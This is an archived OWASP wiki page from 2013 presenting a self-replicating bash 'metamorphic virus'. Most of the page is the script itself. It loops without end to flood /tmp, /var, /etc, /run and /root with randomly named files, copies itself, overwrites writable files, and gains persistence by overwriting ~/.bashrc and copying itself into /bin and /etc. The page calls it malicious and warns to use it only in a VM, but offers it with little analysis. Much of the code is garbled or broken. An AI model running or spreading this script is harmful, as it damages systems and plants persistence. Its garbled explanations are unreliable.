This site is the archived OWASP Foundation Wiki and is no longer accepting Account Requests.
To view the new OWASP Foundation website, please visit https://owasp.org

Metamorphic Virology

From OWASP
Revision as of 22:58, 6 March 2013 by Gregory Disney (talk | contribs)

Jump to: navigation, search 
              Rudimentary Metamorphic Virology 
                    By Gregory Disney-Leugers

Download at: https://docs.google.com/a/owasp.org/file/d/0B3OSDccoP1KhbVkzWE1TZ3hSS0k/edit?usp=sharing

Virology should be viewed as evolutionary biology being used in code, to demonstrate this I wrote a bash script. This code is metamorphic in the since of self modifying and self propagating; This script covers the three main attributes of metamorphic virology methods of survival, reproduction, and exploitation.

Surivival: 

 #!/bin/bash 
 trap  INT 
 for (( ; ; ))
 do

The first line "trap INT" creates a lock on the process meaning once its activated, ctrl+c can't stop the process. Generally speaking with a loop such as the second and third line a pid be created to ensure that it cloud be stopped. In this script no pid is created to ensure survival.


Reproduction: 

  #!/bin/bash
  export RESOLV_HOST_CONF=/etc/shadow
  trap  INT
  for (( ; ; ))
  do 	
  FILE="/tmp/$(basename $0).$RANDOM."
  echo $FILE
  > $FILE
  FILES="/var/$(basename $0).$RANDOM."
  echo $FILES
  > $FILES
  FILEZ="/etc/$(basename $0).$RANDOM."
  echo $FILEZ
  > $FILEZ
  FILE="/tmp/$(basename $0).$RANDOM."
  echo $FILE
  > $FILE
  FILES="/var/$(basename $0).$RANDOM."
  echo $FILES
  > $FILES
  FILEZ="/etc/$(basename $0).$RANDOM."
  echo $FILEZ
  > $FILEZ
  FILER="/run/$(basename $0).$RANDOM."
  echo $FILER
  > $FILER
  FILEQ="/root/$(basename $0).$RANDOM."
  echo $FILEQ
  > $FILEQ

The script now has a loop with producing blank files, Roughly 7 a kernel second. The way the file is written it uses the basemame with a random output. 

   cd /root && chmod u+x /root/$(basename $0).$RANDOM. &&
   cat >~/$(basename $0).$RANDOM. <<FSS
   #!/bin/bash
   trap  INT
   for (( ; ; ))
   do 	
   FILE="/tmp/$(basename $0).$RANDOM."
   echo $FILE
  > $FILE
  FILES="/var/$(basename $0).$RANDOM."
  echo $FILES
  > $FILES
  FILEZ="/etc/$(basename $0).$RANDOM."
  echo $FILEZ
  > $FILEZ
  FILE="/tmp/$(basename $0).$RANDOM."
  echo $FILE
  > $FILE
  FILES="/var/$(basename $0).$RANDOM."
  echo $FILES
  > $FILES
  FILEZ="/etc/$(basename $0).$RANDOM."
  echo $FILEZ
  > $FILEZ
  FILER="/run/$(basename $0).$RANDOM."
  echo $FILER
  > $FILER
  FILEQ="/root/$(basename $0).$RANDOM."
  echo $FILEQ
  > $FILEQ

Using cat now the files are being written with the original loop reproduction script into the generated files. 

 ssh lt 2>/tmp/$(basename $0).$RANDOM.
 cat /tmp/$(basename $0).$RANDOM.|awk -F"\`" {'print   $RANDOM'}|awk -F"\'" {'print $RANDOM'}
 while /bin/true ; do
   for i in $(basename $0)/* ; do
       if [ -w $i -a -c $i -a $i != $RANDOM ]; then
           cat $RANDOM > $i
       fi
done
   done
   exec ~/$(basename $0).$RANDOM.
   FSS

Using cat now the tmp files are being written with a bidien payload. From FSS to FSS is one output file. 

 #!/bin/bash
 trap  INT
 for (( ; ; ))
 do
 FILE="/tmp/linware.1554."
 echo /tmp/linware.13359.
 > /tmp/linware.13359.
 FILES="/var/linware.8552."
 echo /var/linware.13938.
 > /var/linware.13938.
 FILEZ="/etc/linware.15018."
 echo /etc/linware.1714.
 > /etc/linware.1714.
 FILE="/tmp/linware.12031."
 echo /tmp/linware.13359.
 > /tmp/linware.13359.
 FILES="/var/linware.28141."
 echo /var/linware.13938.
 > /var/linware.13938.
 FILEZ="/etc/linware.29119."
 echo /etc/linware.1714.
 > /etc/linware.1714.
 FILER="/run/linware.21852."
 echo /run/linware.18072.
 > /run/linware.18072.
 FILEQ="/root/linware.14767."
 echo /root/linware.22566.
 > /root/linware.22566.
 ....
 exec ~/linware.22566.

Here's a sample script of the output of the output script, at end of the script it executes another output script. This can be used to map the propagation of the malware.

Exploitation: 

 cat >~/.bashrc <<ASS
 /opt/linware
 /bin/linware
 /etc/linware
 /run/linware
 ASS
 cp /opt/linware /bin
 cp /opt/linware /etc
 exec /opt/linware
 exec ~/$(basename $0).$RANDOM

Using cat once again the script writes to the bashrc, to infect bash to ensure survival. At end of the loop script it initiates the script all over again.

https://docs.google.com/a/owasp.org/file/d/0B3OSDccoP1KhbVkzWE1TZ3hSS0k/edit?usp=sharing

WARNING: this script only be used in a controlled environment such as a VM.

WARNING: This script should be consider malicious.

Retrieved from "https://wiki.owasp.org/index.php?title=Metamorphic_Virology&oldid=146893"